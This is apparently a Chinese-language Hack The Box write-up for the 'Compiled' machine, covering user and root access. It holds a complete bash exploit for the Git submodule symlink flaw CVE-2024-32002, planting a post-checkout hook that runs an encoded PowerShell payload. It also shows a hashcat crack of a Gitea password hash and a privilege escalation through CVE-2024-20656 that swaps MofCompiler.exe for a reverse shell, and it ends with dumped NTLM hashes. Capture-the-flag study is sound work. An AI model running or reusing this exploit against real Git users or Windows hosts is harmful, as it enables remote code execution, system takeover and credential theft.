【season-6】 box Compiled wp

htb-Season-6
3.2k words

USER

在他的gitea的example中有暴露他git的版本号。

不知道为什么我本地搭的用python的临时http一直报错,没办法最后用的他自己的git

参考
https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# optional, but I added it to avoid the warning message
git config --global init.defaultBranch main 


# Define the tell-tale path
#tell_tale_path="$PWD/tell.tale"
#因为是将hook连接过去,所以需要准备两个库

git clone http://compiled.htb:3000/test/test.git 
cd test
# Initialize the hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
powershell -e JABjAGwAaQBxxxx
open -a Calculator.app
EOF

# Make the hook executable: important
chmod +x y/hooks/post-checkout
echo 1111
git add y/hooks/post-checkout
git commit -m "post-checkout"
cd ..
git push 


# Define the hook repository path
#第二个hook,用于拉取执行命令

# Initialize the captain repository
git clone http://compiled.htb:3000/test/test3.git
cd test2
git submodule add --name x/y "http://compiled.htb:3000/test/test.git" A/modules/x
git commit -m "add-submodule"

# Create a symlink
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push
cd ..

#git clone source2 rce

gitea翻密码就行,这个不多赘述

1
2
└─$ hashcat 'sha256:50000:In2HPMqJEDzYOpdr2sUkhg:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY' -m 10900 -a 0 --show
sha256:50000:In2HPMqJEDzYOpdr2sUkhg:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY:12345678

ROOT

其实我一开始就找到了路,因为winpeas扫到了

1
2
ÉÍÍÍÍÍÍÍÍÍ͹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
     File Permissions "C:\Users\All Users\Microsoft\VisualStudio\SetupWMI\MofCompiler.exe": Authenticated Users [WriteData/CreateFiles]

这个路径太稀有了,我在别的机器没见过

文章目前也没有太多参考,我能搜到的就是这篇

https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/

下面的poc也是基于mdsec的

https://github.com/ruycr4ft/CVE-2024-20656

其原理的前半段我是没看懂..不过我知道他后半段删除MofCompiler.exe了,而msi修复vs又会执行它,我们后面做的就是来让修复程序重新执行的过程中替换掉了MofCompiler.exe,以至于最后system执行了替换过的MofCompiler.exe。

github的poc我修改了下他VSDiagnostics的路径到正确位置

最初cmd.exe的部分我没改跑的,不知道为啥会有问题,考虑了下可能执行上权限有问题,也没有执行通,我试了下copy权限没问题,但他是一直执行了下去了,却没有执行cb1到,我看是执行到

1
ReadDirectoryChangesW(hDir, buff, 4096, TRUE, FILE_NOTIFY_CHANGE_FILE_NAME, &ret, NULL, NULL);

就没往下走,直接跳到StartWMIMsi,同时执行结束后MofCompiler.exe也没了

reset之后直接给替换了个revshell.exe,很神奇的这次就可以了,不知道为什么,我怀疑是机器问题,当然也有可能是system32目录有问题

1
2
3
4
5
6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f75c95bc9312632edec46b607938061e:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ac8352a8680463c78247b75a023999cc:::
Emily:1001:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
Richard:1002:aad3b435b51404eeaad3b435b51404ee:f21635b4c33e9ed3ee47dd5b31ff0f92:::